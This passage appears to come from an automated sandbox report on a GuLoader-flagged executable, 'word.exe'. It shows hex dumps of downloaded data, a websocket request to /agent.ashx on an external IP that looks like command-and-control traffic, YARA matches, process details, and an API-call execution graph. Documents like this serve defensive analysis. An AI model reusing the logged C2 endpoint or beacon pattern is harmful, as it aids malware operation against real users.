                                                        2024-08-22 14:13:35 UTC4096INData Raw: 24 5c 88 92 48 22 cb 58 7c 49 e5 62 4c 82 73 54 86 bd 4e 41 01 11 e8 e2 01 40 5d 47 d0 4b 2a 6b af 19 4c ad 9a 1e ea 18 62 82 5d 93 94 01 38 ea 10 6b f4 10 ea 37 44 22 e7 9d 6f 99 b0 76 b5 09 e3 73 8c 63 e1 7e bd 5b ab 0a 2f ec be d8 5c 70 7f 59 fc 31 b5 24 b4 26 d8 5f 4b 44 be 2a 8b 6e d0 2b 15 e9 ac 92 c1 c1 de 73 82 63 c5 fc 4c 62 7c e9 24 80 ea a5 13 94 f4 c4 92 d6 06 14 27 75 ff f0 7b 4f f1 39 65 fc cd 71 68 e3 fa 9e 33 0c c3 e1 e3 36 b8 0e e1 c2 ab 1e 5b df a4 ac 92 ab 2a 4c b3 cd 77 b9 30 6e 13 c9 f4 b0 27 3f c7 ea b0 f4 b0 ad b9 64 98 9a f2 37 0f 60 40 ae 4f c4 e1 26 a0 55 bb 44 9d 1d 78 b5 3f 81 e6 57 25 a8 43 83 fc d0 cb 7c 46 30 85 23 ee 96 96 e3 54 6a 5c 5a cf dc 68 b6 6e b3 32 a4 81 09 69 e7 ab b3 08 fe 27 84 78 aa bc 33 93 c4 5c 9b 6c e7 bd
                                                        Data Ascii: $\H"X|IbLsTNA@]GK*kLb]8k7D"ovsc~[/\pY1$&_KD*n+scLb|$'u{O9eqh36[*Lw0n'?d7`@O&UDx?W%C|F0#Tj\Zhn2i'x3\l
                                                        2024-08-22 14:13:35 UTC4096INData Raw: 09 81 77 0d c0 56 93 9c 7a 48 e8 6b 3d 86 0c fb 45 78 43 d6 ed 00 c6 b0 74 c4 7f e1 08 da 75 8e 02 bf 20 f2 0a 2d 93 a7 9b 5d 74 62 36 87 4a e7 2e b4 24 d8 da 3a 14 be 2e ff 25 81 2a 65 8c 96 d7 c0 cb d4 75 82 63 ee fc 4c 62 61 fb 30 80 90 d5 4b 19 ce ce 92 d5 58 77 25 0e a0 9f 42 4b 53 16 70 85 cf 2d 68 e7 91 06 16 14 cb 9a b3 34 c3 7f 43 e7 b6 6e 50 aa a4 dc f9 5c 0f 56 bb b6 1f c2 45 6a b1 e8 9d c2 49 58 b7 85 85 56 95 bb bb 1d 8a ef f2 33 a9 52 32 f4 35 ac eb 26 a6 8c e7 5a 9f 62 07 c7 3f 85 4e 1d 64 a1 41 f2 a4 d2 b0 01 e4 15 9e 3f 83 9e cf e3 5e 6e fc 04 a9 d7 6a c9 5b c7 32 a0 29 34 fb c9 a9 c8 5d db 31 82 a1 bf 69 33 97 6c 79 8e 15 cf c6 f0 da 71 01 99 40 03 3b a2 46 2b cb 59 f5 f9 dd 6e 52 20 7b 70 d8 53 c8 5c e3 4f 1e 47 4a 3b 48 0e 05 25 a2 c3
                                                        Data Ascii: wVzHk=ExCtu -]tb6J.$:.%*eucLba0KXw%BKSp-h4CnP\VEjIXV3R25&Zb?NdA?^nj[2)4]1i3lyq@;F+YnR {pS\OGJ;H%
                                                        2024-08-22 14:13:35 UTC4096INData Raw: 36 9a bd 91 5d 00 d7 7c e4 4c ff be 16 0a d8 a0 4d 1e ae 2b 8d 6f d0 32 15 93 c0 a5 a0 d6 d4 03 a8 5d 96 fc 46 6d 3b 2c 25 80 ea bd 71 6d cf c4 98 db 2b 8c 4c 14 fc d8 0e 4a 53 16 7f e4 be a3 01 bb 73 e0 16 14 c0 89 b1 3f ae 1b 47 f1 a8 34 56 be a4 a6 96 01 19 47 b5 ac 15 37 59 42 c7 ed ef b8 5c 5a bc 95 b4 56 91 a2 b3 0e f9 b6 e0 33 af 3e dd ac 34 a8 f0 22 cb 47 9e 5a 95 40 2f 9e 16 85 46 65 47 de 41 f8 a0 d2 b0 f9 e4 15 9e 38 e8 fb de e7 da 07 fc 81 d6 43 6a cd 32 c0 10 a1 23 26 62 84 de c9 5c f4 01 80 cd d6 6f 18 93 df 5a b3 17 b4 ae c0 dc 75 c8 f6 35 03 06 a8 46 3c c9 20 f7 78 dd 6a 24 b3 01 08 a9 3c 97 5c e1 3e 9e 45 31 46 27 42 01 0d f5 d5 dd ad c1 9b 4c 94 f5 a9 20 e4 7f e0 a8 65 b5 b6 25 98 e0 ed 3a e2 1f 92 da b8 3d ff 35 ae 45 b5 e1 9f b1 bf 9a
                                                        Data Ascii: 6]|LM+o2]Fm;,%qm+LJSs?G4VG7YB\ZV3>4"GZ@/FeGA8Cj2#&b\oZu5F< xj$<\>E1F'BL e%:=5E


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        1192.168.11.2049795186.2.171.764438792C:\Users\user\Desktop\word.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-08-22 14:13:46 UTC235OUTGET /agent.ashx HTTP/1.1
                                                        Host: 186.2.171.76
                                                        Upgrade: websocket
                                                        Connection: Upgrade
                                                        Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==
                                                        Sec-WebSocket-Version: 13
                                                        Sec-WebSocket-Extensions: permessage-deflate; client_no_context_takeover
                                                        2024-08-22 14:13:47 UTC651INHTTP/1.1 404 Not Found
                                                        Referrer-Policy: no-referrer
                                                        X-XSS-Protection: 1; mode=block
                                                        X-Content-Type-Options: nosniff
                                                        Content-Security-Policy: default-src 'none'; script-src 'self' 'nonce-aaD1X7EAHdjb4ROQfLpG'; img-src 'self'; style-src 'self' 'nonce-aaD1X7EAHdjb4ROQfLpG';
                                                        Content-Type: text/html; charset=utf-8
                                                        Content-Length: 2551
                                                        ETag: W/"9f7-Mp+Fx3llRl+T15vdlmej7Jb+VGo"
                                                        Set-Cookie: xid=e30=; path=/; samesite=lax; secure; httponly
                                                        Set-Cookie: xid.sig=BzUgfgjtGT50YZcFx1QzksALeKi6x4FkK-W1U0iWT-1Ab08e5FW08ZvU_ej4h5aG; path=/; samesite=lax; secure; httponly
                                                        Vary: Accept-Encoding
                                                        Date: Thu, 22 Aug 2024 14:13:46 GMT
                                                        Connection: close
                                                        2024-08-22 14:13:47 UTC2551INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 22 6c 74 72 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 43 6f 6e 74 65 6e 74 2d 54 79 70 65 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 75 73 65 72 2d 73
                                                        Data Ascii: <!DOCTYPE html><html lang="en" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv=X-UA-Compatible content="IE=edge" /> <meta content="text/html;charset=utf-8" http-equiv=Content-Type /> <meta name=viewport content="user-s


                                                        Click to jump to process

                                                        Click to jump to process

                                                        Click to dive into process behavior distribution

                                                        Click to jump to process

                                                        Target ID:0
                                                        Start time:10:12:05
                                                        Start date:22/08/2024
                                                        Path:C:\Users\user\Desktop\word.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\word.exe"
                                                        Imagebase:0x400000
                                                        File size:721'136 bytes
                                                        MD5 hash:0EA4553778672B58BBD711FB039552C8
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000000.00000002.1794654590.0000000003100000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000000.00000002.1794245028.00000000028E0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1794654590.0000000006E40000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:low
                                                        Has exited:true

                                                        Target ID:21
                                                        Start time:10:13:16
                                                        Start date:22/08/2024
                                                        Path:C:\Users\user\Desktop\word.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\word.exe"
                                                        Imagebase:0x400000
                                                        File size:721'136 bytes
                                                        MD5 hash:0EA4553778672B58BBD711FB039552C8
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000015.00000002.5953667909.00000000016D0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:low
                                                        Has exited:false

                                                        Reset < >

                                                          Execution Graph

                                                          Execution Coverage:17.2%
                                                          Dynamic/Decrypted Code Coverage:14.2%
                                                          Signature Coverage:20.8%
                                                          Total number of Nodes:1468
                                                          Total number of Limit Nodes:38
                                                          execution_graph 3848 4022c0 3849 4022f0 3848->3849 3850 4022c5 3848->3850 3864 4029fd 3849->3864 3860 402b07 3850->3860 3853 4022cc 3855 4022d6 3853->3855 3859 40230d 3853->3859 3854 4022f7 3870 402a3d RegOpenKeyExA 3854->3870 3856 4029fd 18 API calls 3855->3856 3857 4022dd RegDeleteValueA RegCloseKey 3856->3857 3857->3859 3861 4029fd 18 API calls 3860->3861 3862 402b20 3861->3862 3863 402b2e RegOpenKeyExA 3862->3863 3863->3853 3865 402a09 3864->3865 3881 405d13 3865->3881 3868 402a36 3868->3854 3871 402ad1 3870->3871 3875 402a68 3870->3875 3871->3859 3872 402a8e RegEnumKeyA 3873 402aa0 RegCloseKey 3872->3873 3872->3875 3920 40601c GetModuleHandleA 3873->3920 3874 402ac5 RegCloseKey 3879 402ab4 3874->3879 3875->3872 3875->3873 3875->3874 3877 402a3d 3 API calls 3875->3877 3877->3875 3879->3871 3880 402ae0 RegDeleteKeyA 3880->3879 3895 405d20 3881->3895 3882 402a2a 3882->3868 3899 405f5c 3882->3899 3883 405f43 3883->3882 3915 405cf1 lstrcpynA 3883->3915 3885 405dc1 GetVersion 3885->3895 3886 405f1a lstrlenA 3886->3895 3889 405d13 10 API calls 3889->3886 3891 405e39 GetSystemDirectoryA 3891->3895 3892 405e4c GetWindowsDirectoryA 3892->3895 3893 405f5c 5 API calls 3893->3895 3894 405e80 SHGetSpecialFolderLocation 3894->3895 3898 405e98 SHGetPathFromIDListA CoTaskMemFree 3894->3898 3895->3883 3895->3885 3895->3886 3895->3889 3895->3891 3895->3892 3895->3893 3895->3894 3896 405d13 10 API calls 3895->3896 3897 405ec3 lstrcatA 3895->3897 3908 405bd8 RegOpenKeyExA 3895->3908 3913 405c4f wsprintfA 3895->3913 3914 405cf1 lstrcpynA 3895->3914 3896->3895 3897->3895 3898->3895 3906 405f68 3899->3906 3900 405fd4 CharPrevA 3903 405fd0 3900->3903 3901 405fc5 CharNextA 3901->3903 3901->3906 3903->3900 3904 405fef 3903->3904 3904->3868 3905 405fb3 CharNextA 3905->3906 3906->3901 3906->3903 3906->3905 3907 405fc0 CharNextA 3906->3907 3916 4057ac 3906->3916 3907->3901 3909 405c49 3908->3909 3910 405c0b RegQueryValueExA 3908->3910 3909->3895 3911 405c2c RegCloseKey 3910->3911 3911->3909 3913->3895 3914->3895 3915->3882 3917 4057b2 3916->3917 3918 4057c5 3917->3918 3919 4057b8 CharNextA 3917->3919 3918->3906 3919->3917 3921 406043 GetProcAddress 3920->3921 3922 406038 LoadLibraryA 3920->3922 3923 402ab0 3921->3923 3922->3921 3922->3923 3923->3879 3923->3880 4757 4019c0 4758 4029fd 18 API calls 4757->4758 4759 4019c7 4758->4759 4760 4029fd 18 API calls 4759->4760 4761 4019d0 4760->4761 4762 4019d7 lstrcmpiA 4761->4762 4763 4019e9 lstrcmpA 4761->4763 4764 4019dd 4762->4764 4763->4764 4765 402b42 4766 402b51 SetTimer 4765->4766 4767 402b6a 4765->4767 4766->4767 4768 402bb8 4767->4768 4769 402bbe MulDiv 4767->4769 4770 402b78 wsprintfA SetWindowTextA SetDlgItemTextA 4769->4770 4770->4768 4772 402645 4773 4029fd 18 API calls 4772->4773 4774 40264c FindFirstFileA 4773->4774 4775 40266f 4774->4775 4778 40265f 4774->4778 4780 405c4f wsprintfA 4775->4780 4777 402676 4781 405cf1 lstrcpynA 4777->4781 4780->4777 4781->4778 4782 403745 4783 403750 4782->4783 4784 403754 4783->4784 4785 403757 GlobalAlloc 4783->4785 4785->4784 4127 4023c8 4128 402b07 19 API calls 4127->4128 4129 4023d2 4128->4129 4130 4029fd 18 API calls 4129->4130 4131 4023db 4130->4131 4132 4023e5 RegQueryValueExA 4131->4132 4137 402663 4131->4137 4133 40240b RegCloseKey 4132->4133 4134 402405 4132->4134 4133->4137 4134->4133 4138 405c4f wsprintfA 4134->4138 4138->4133 4789 4062cb 4790 40614f 4789->4790 4791 406aba 4790->4791 4792 4061d0 GlobalFree 4790->4792 4793 4061d9 GlobalAlloc 4790->4793 4794 406250 GlobalAlloc 4790->4794 4795 406247 GlobalFree 4790->4795 4792->4793 4793->4790 4793->4791 4794->4790 4794->4791 4795->4794 4796 401ccc GetDlgItem GetClientRect 4797 4029fd 18 API calls 4796->4797 4798 401cfc LoadImageA SendMessageA 4797->4798 4799 402892 4798->4799 4800 401d1a DeleteObject 4798->4800 4800->4799 4801 1000180d 4802 10001830 4801->4802 4803 10001860 GlobalFree 4802->4803 4804 10001872 4802->4804 4803->4804 4805 10001266 2 API calls 4804->4805 4806 100019e3 GlobalFree GlobalFree 4805->4806 4161 1000270f 4162 1000275f 4161->4162 4163 1000271f VirtualProtect 4161->4163 4163->4162 4807 404f50 4808 404f60 4807->4808 4809 404f74 4807->4809 4810 404f66 4808->4810 4811 404fbd 4808->4811 4812 404f7c IsWindowVisible 4809->4812 4818 404f93 4809->4818 4814 404038 SendMessageA 4810->4814 4813 404fc2 CallWindowProcA 4811->4813 4812->4811 4815 404f89 4812->4815 4816 404f70 4813->4816 4814->4816 4820 4048a7 SendMessageA 4815->4820 4818->4813 4825 404927 4818->4825 4821 404906 SendMessageA 4820->4821 4822 4048ca GetMessagePos ScreenToClient SendMessageA 4820->4822 4824 4048fe 4821->4824 4823 404903 4822->4823 4822->4824 4823->4821 4824->4818 4834 405cf1 lstrcpynA 4825->4834 4827 40493a 4835 405c4f wsprintfA 4827->4835 4829 404944 4830 40140b 2 API calls 4829->4830 4831 40494d 4830->4831 4836 405cf1 lstrcpynA 4831->4836 4833 404954 4833->4811 4834->4827 4835->4829 4836->4833 4837 4024d1 4838 4024d6 4837->4838 4839 4024e7 4837->4839 4840 4029e0 18 API calls 4838->4840 4841 4029fd 18 API calls 4839->4841 4843 4024dd 4840->4843 4842 4024ee lstrlenA 4841->4842 4842->4843 4844 40250d WriteFile 4843->4844 4845 402663 4843->4845 4844->4845 4164 4025d3 4165 40283f 4164->4165 4166 4025da 4164->4166 4167 4029e0 18 API calls 4166->4167 4168 4025e5 4167->4168 4169 4025ec SetFilePointer 4168->4169 4169->4165 4170 4025fc 4169->4170 4172 405c4f wsprintfA 4170->4172 4172->4165 4220 4014d6 4221 4029e0 18 API calls 4220->4221 4222 4014dc Sleep 4221->4222 4224 402892 4222->4224 4853 401dd8 4854 4029fd 18 API calls 4853->4854 4855 401dde 4854->4855 4856 4029fd 18 API calls 4855->4856 4857 401de7 4856->4857 4858 4029fd 18 API calls 4857->4858 4859 401df0 4858->4859 4860 4029fd 18 API calls 4859->4860 4861 401df9 4860->4861 4862 401423 25 API calls 4861->4862 4863 401e00 ShellExecuteA 4862->4863 4864 401e2d 4863->4864 4865 404959 GetDlgItem GetDlgItem 4866 4049ab 7 API calls 4865->4866 4905 404bc3 4865->4905 4867 404a41 SendMessageA 4866->4867 4868 404a4e DeleteObject 4866->4868 4867->4868 4869 404a57 4868->4869 4870 404a8e 4869->4870 4874 405d13 18 API calls 4869->4874 4916 403fec 4870->4916 4871 404ca7 4873 404d53 4871->4873 4879 404bb6 4871->4879 4883 404d00 SendMessageA 4871->4883 4875 404d65 4873->4875 4876 404d5d SendMessageA 4873->4876 4877 404a70 SendMessageA SendMessageA 4874->4877 4886 404d77 ImageList_Destroy 4875->4886 4887 404d7e 4875->4887 4894 404d8e 4875->4894 4876->4875 4877->4869 4878 404aa2 4882 403fec 19 API calls 4878->4882 4929 404053 4879->4929 4880 404c99 SendMessageA 4880->4871 4881 4048a7 5 API calls 4898 404c34 4881->4898 4899 404ab0 4882->4899 4883->4879 4889 404d15 SendMessageA 4883->4889 4886->4887 4890 404d87 GlobalFree 4887->4890 4887->4894 4888 404efd 4888->4879 4895 404f0f ShowWindow GetDlgItem ShowWindow 4888->4895 4892 404d28 4889->4892 4890->4894 4891 404b84 GetWindowLongA SetWindowLongA 4893 404b9d 4891->4893 4903 404d39 SendMessageA 4892->4903 4896 404ba3 ShowWindow 4893->4896 4897 404bbb 4893->4897 4894->4888 4908 404927 4 API calls 4894->4908 4912 404dc9 4894->4912 4895->4879 4919 404021 SendMessageA 4896->4919 4920 404021 SendMessageA 4897->4920 4898->4871 4898->4880 4899->4891 4902 404aff SendMessageA 4899->4902 4904 404b7e 4899->4904 4906 404b3b SendMessageA 4899->4906 4907 404b4c SendMessageA 4899->4907 4902->4899 4903->4873 4904->4891 4904->4893 4905->4871 4905->4881 4905->4898 4906->4899 4907->4899 4908->4912 4909 404ed3 InvalidateRect 4909->4888 4910 404ee9 4909->4910 4921 4047c5 4910->4921 4911 404df7 SendMessageA 4915 404e0d 4911->4915 4912->4911 4912->4915 4914 404e81 SendMessageA SendMessageA 4914->4915 4915->4909 4915->4914 4917 405d13 18 API calls 4916->4917 4918 403ff7 SetDlgItemTextA 4917->4918 4918->4878 4919->4879 4920->4905 4922 4047df 4921->4922 4923 405d13 18 API calls 4922->4923 4924 404814 4923->4924 4925 405d13 18 API calls 4924->4925 4926 40481f 4925->4926 4927 405d13 18 API calls 4926->4927 4928 404850 lstrlenA wsprintfA SetDlgItemTextA 4927->4928 4928->4888 4930 40406b GetWindowLongA 4929->4930 4940 4040f4 4929->4940 4931 40407c 4930->4931 4930->4940 4932 40408b GetSysColor 4931->4932 4933 40408e 4931->4933 4932->4933 4934 404094 SetTextColor 4933->4934 4935 40409e SetBkMode 4933->4935 4934->4935 4936 4040b6 GetSysColor 4935->4936 4937 4040bc 4935->4937 4936->4937 4938 4040c3 SetBkColor 4937->4938 4939 4040cd 4937->4939 4938->4939 4939->4940 4941 4040e0 DeleteObject 4939->4941 4942 4040e7 CreateBrushIndirect 4939->4942 4941->4942 4942->4940 4943 1000161a 4944 10001649 4943->4944 4945 10001a5d 18 API calls 4944->4945 4946 10001650 4945->4946 4947 10001663 4946->4947 4948 10001657 4946->4948 4950 1000168a 4947->4950 4951 1000166d 4947->4951 4949 10001266 2 API calls 4948->4949 4957 10001661 4949->4957 4952 10001690 4950->4952 4953 100016b4 4950->4953 4954 100014e2 3 API calls 4951->4954 4955 10001559 3 API calls 4952->4955 4956 100014e2 3 API calls 4953->4956 4958 10001672 4954->4958 4959 10001695 4955->4959 4956->4957 4960 10001559 3 API calls 4958->4960 4961 10001266 2 API calls 4959->4961 4962 10001678 4960->4962 4963 1000169b GlobalFree 4961->4963 4964 10001266 2 API calls 4962->4964 4963->4957 4965 100016af GlobalFree 4963->4965 4966 1000167e GlobalFree 4964->4966 4965->4957 4966->4957 4967 40155b 4968 401577 ShowWindow 4967->4968 4969 40157e 4967->4969 4968->4969 4970 402892 4969->4970 4971 40158c ShowWindow 4969->4971 4971->4970 4972 401edc 4973 4029fd 18 API calls 4972->4973 4974 401ee3 GetFileVersionInfoSizeA 4973->4974 4975 401f06 GlobalAlloc 4974->4975 4978 401f5c 4974->4978 4976 401f1a GetFileVersionInfoA 4975->4976 4975->4978 4977 401f2b VerQueryValueA 4976->4977 4976->4978 4977->4978 4979 401f44 4977->4979 4983 405c4f wsprintfA 4979->4983 4981 401f50 4984 405c4f wsprintfA 4981->4984 4983->4981 4984->4978 4985 40475f 4986 40478b 4985->4986 4987 40476f 4985->4987 4989 404791 SHGetPathFromIDListA 4986->4989 4990 4047be 4986->4990 4996 4054e9 GetDlgItemTextA 4987->4996 4992 4047a1 4989->4992 4995 4047a8 SendMessageA 4989->4995 4991 40477c SendMessageA 4991->4986 4993 40140b 2 API calls 4992->4993 4993->4995 4995->4990 4996->4991 5002 4018e3 5003 40191a 5002->5003 5004 4029fd 18 API calls 5003->5004 5005 40191f 5004->5005 5006 4055b1 71 API calls 5005->5006 5007 401928 5006->5007 5008 4043e3 5009 4043f3 5008->5009 5010 404419 5008->5010 5011 403fec 19 API calls 5009->5011 5012 404053 8 API calls 5010->5012 5013 404400 SetDlgItemTextA 5011->5013 5014 404425 5012->5014 5013->5010 5015 4018e6 5016 4029fd 18 API calls 5015->5016 5017 4018ed 5016->5017 5018 405505 MessageBoxIndirectA 5017->5018 5019 4018f6 5018->5019 3935 401f68 3936 401f7a 3935->3936 3937 402028 3935->3937 3938 4029fd 18 API calls 3936->3938 3939 401423 25 API calls 3937->3939 3940 401f81 3938->3940 3946 402181 3939->3946 3941 4029fd 18 API calls 3940->3941 3942 401f8a 3941->3942 3943 401f92 GetModuleHandleA 3942->3943 3944 401f9f LoadLibraryExA 3942->3944 3943->3944 3945 401faf GetProcAddress 3943->3945 3944->3937 3944->3945 3947 401ffb 3945->3947 3948 401fbe 3945->3948 4001 404fdc 3947->4001 3950 401fc6 3948->3950 3951 401fdd 3948->3951 3998 401423 3950->3998 3956 100016bd 3951->3956 3953 401fce 3953->3946 3954 40201c FreeLibrary 3953->3954 3954->3946 3957 100016ed 3956->3957 4012 10001a5d 3957->4012 3959 100016f4 3960 1000180a 3959->3960 3961 10001705 3959->3961 3962 1000170c 3959->3962 3960->3953 4061 100021b0 3961->4061 4044 100021fa 3962->4044 3967 10001770 3973 100017b2 3967->3973 3974 10001776 3967->3974 3968 10001752 4074 100023da 3968->4074 3969 10001722 3972 10001728 3969->3972 3977 10001733 3969->3977 3970 1000173b 3983 10001731 3970->3983 4071 10002aa7 3970->4071 3972->3983 4055 100027ec 3972->4055 3975 100023da 11 API calls 3973->3975 3979 10001559 3 API calls 3974->3979 3981 100017a4 3975->3981 3976 10001758 4085 10001559 3976->4085 4065 1000258d 3977->4065 3985 1000178c 3979->3985 3989 100017f9 3981->3989 4096 100023a0 3981->4096 3983->3967 3983->3968 3988 100023da 11 API calls 3985->3988 3987 10001739 3987->3983 3988->3981 3989->3960 3993 10001803 GlobalFree 3989->3993 3993->3960 3995 100017e5 3995->3989 4100 100014e2 wsprintfA 3995->4100 3996 100017de FreeLibrary 3996->3995 3999 404fdc 25 API calls 3998->3999 4000 401431 3999->4000 4000->3953 4002 40509a 4001->4002 4003 404ff7 4001->4003 4002->3953 4004 405014 lstrlenA 4003->4004 4005 405d13 18 API calls 4003->4005 4006 405022 lstrlenA 4004->4006 4007 40503d 4004->4007 4005->4004 4006->4002 4008 405034 lstrcatA 4006->4008 4009 405050 4007->4009 4010 405043 SetWindowTextA 4007->4010 4008->4007 4009->4002 4011 405056 SendMessageA SendMessageA SendMessageA 4009->4011 4010->4009 4011->4002 4103 10001215 GlobalAlloc 4012->4103 4014 10001a81 4104 10001215 GlobalAlloc 4014->4104 4016 10001cbb GlobalFree GlobalFree GlobalFree 4017 10001cd8 4016->4017 4027 10001d22 4016->4027 4019 1000201a 4017->4019 4017->4027 4029 10001ced 4017->4029 4018 10001a8c 4018->4016 4020 10001b60 GlobalAlloc 4018->4020 4022 10001bc9 GlobalFree 4018->4022 4025 10001bab lstrcpyA 4018->4025 4026 10001bb5 lstrcpyA 4018->4026 4018->4027 4030 10001f7a 4018->4030 4039 10001c07 4018->4039 4040 10001e75 GlobalFree 4018->4040 4041 10001224 2 API calls 4018->4041 4110 10001215 GlobalAlloc 4018->4110 4021 1000203c GetModuleHandleA 4019->4021 4019->4027 4020->4018 4023 10002062 4021->4023 4024 1000204d LoadLibraryA 4021->4024 4022->4018 4111 100015a4 GetProcAddress 4023->4111 4024->4023 4024->4027 4025->4026 4026->4018 4027->3959 4029->4027 4107 10001224 4029->4107 4030->4027 4037 10001fbe lstrcpyA 4030->4037 4031 10002074 4032 100020b3 4031->4032 4043 1000209d GetProcAddress 4031->4043 4032->4027 4033 100020c0 lstrlenA 4032->4033 4112 100015a4 GetProcAddress 4033->4112 4037->4027 4038 100020d9 4038->4027 4039->4018 4105 10001534 GlobalSize GlobalAlloc 4039->4105 4040->4018 4041->4018 4043->4032 4053 10002212 4044->4053 4046 10002349 GlobalFree 4047 10001712 4046->4047 4046->4053 4047->3969 4047->3970 4047->3983 4048 100022b9 GlobalAlloc MultiByteToWideChar 4051 10002303 4048->4051 4052 100022e3 GlobalAlloc CLSIDFromString GlobalFree 4048->4052 4049 1000230a lstrlenA 4049->4046 4049->4051 4050 10001224 GlobalAlloc lstrcpynA 4050->4053 4051->4046 4118 10002521 4051->4118 4052->4046 4053->4046 4053->4048 4053->4049 4053->4050 4114 100012ad 4053->4114 4057 100027fe 4055->4057 4056 100028a3 CreateFileA 4058 100028c1 4056->4058 4057->4056 4059 100029b2 GetLastError 4058->4059 4060 100029bd 4058->4060 4059->4060 4060->3983 4062 100021c0 4061->4062 4063 1000170b 4061->4063 4062->4063 4064 100021d2 GlobalAlloc 4062->4064 4063->3962 4064->4062 4068 100025a9 4065->4068 4066 100025fa GlobalAlloc 4070 1000261c 4066->4070 4067 1000260d 4069 10002612 GlobalSize 4067->4069 4067->4070 4068->4066 4068->4067 4069->4070 4070->3987 4072 10002ab2 4071->4072 4073 10002af2 GlobalFree 4072->4073 4121 10001215 GlobalAlloc 4074->4121 4076 100023e6 4077 10002473 WideCharToMultiByte 4076->4077 4078 1000243a lstrcpynA 4076->4078 4079 1000244b StringFromGUID2 WideCharToMultiByte 4076->4079 4080 10002494 wsprintfA 4076->4080 4081 100024b8 GlobalFree 4076->4081 4082 100024f2 GlobalFree 4076->4082 4083 10001266 2 API calls 4076->4083 4122 100012d1 4076->4122 4077->4076 4078->4076 4079->4076 4080->4076 4081->4076 4082->3976 4083->4076 4126 10001215 GlobalAlloc 4085->4126 4087 1000155f 4088 1000156c lstrcpyA 4087->4088 4090 10001586 4087->4090 4091 100015a0 4088->4091 4090->4091 4092 1000158b wsprintfA 4090->4092 4093 10001266 4091->4093 4092->4091 4094 100012a8 GlobalFree 4093->4094 4095 1000126f GlobalAlloc lstrcpynA 4093->4095 4094->3981 4095->4094 4097 100017c5 4096->4097 4098 100023ae 4096->4098 4097->3995 4097->3996 4098->4097 4099 100023c7 GlobalFree 4098->4099 4099->4098 4101 10001266 2 API calls 4100->4101 4102 10001503 4101->4102 4102->3989 4103->4014 4104->4018 4106 10001552 4105->4106 4106->4039 4113 10001215 GlobalAlloc 4107->4113 4109 10001233 lstrcpynA 4109->4027 4110->4018 4111->4031 4112->4038 4113->4109 4115 100012b4 4114->4115 4116 10001224 2 API calls 4115->4116 4117 100012cf 4116->4117 4117->4053 4119 10002585 4118->4119 4120 1000252f VirtualAlloc 4118->4120 4119->4051 4120->4119 4121->4076 4123 100012f9 4122->4123 4124 100012da 4122->4124 4123->4076 4124->4123 4125 100012e0 lstrcpyA 4124->4125 4125->4123 4126->4087 5027 40286d SendMessageA 5028 402892 5027->5028 5029 402887 InvalidateRect 5027->5029 5029->5028 5030 4014f0 SetForegroundWindow 5031 402892 5030->5031 5032 401af0 5033 4029fd 18 API calls 5032->5033 5034 401af7 5033->5034 5035 4029e0 18 API calls 5034->5035 5036 401b00 wsprintfA 5035->5036 5037 402892 5036->5037 5038 4019f1 5039 4029fd 18 API calls 5038->5039 5040 4019fa ExpandEnvironmentStringsA 5039->5040 5041 401a0e 5040->5041 5043 401a21 5040->5043 5042 401a13 lstrcmpA 5041->5042 5041->5043 5042->5043 5044 100015b3 5050 100014bb 5044->5050 5046 10001611 GlobalFree 5047 100015cb 5047->5046 5048 100015e6 5047->5048 5049 100015fd VirtualFree 5047->5049 5048->5046 5049->5046 5052 100014c1 5050->5052 5051 100014c7 5051->5047 5052->5051 5053 100014d3 GlobalFree 5052->5053 5053->5047 5054 401c78 5055 4029e0 18 API calls 5054->5055 5056 401c7e IsWindow 5055->5056 5057 4019e1 5056->5057 5058 1000103d 5061 1000101b 5058->5061 5062 100014bb GlobalFree 5061->5062 5063 10001020 5062->5063 5064 10001027 GlobalAlloc 5063->5064 5065 10001024 5063->5065 5064->5065 5066 100014e2 3 API calls 5065->5066 5067 1000103b 5066->5067 5068 4014fe 5069 401506 5068->5069 5071 401519 5068->5071 5070 4029e0 18 API calls 5069->5070 5070->5071 4708 40227f 4709 4029fd 18 API calls 4708->4709 4710 402290 4709->4710 4711 4029fd 18 API calls 4710->4711 4712 402299 4711->4712 4713 4029fd 18 API calls 4712->4713 4714 4022a3 GetPrivateProfileStringA 4713->4714 5072 401000 5073 401037 BeginPaint GetClientRect 5072->5073 5074 40100c DefWindowProcA 5072->5074 5076 4010f3 5073->5076 5077 401179 5074->5077 5078 401073 CreateBrushIndirect FillRect DeleteObject 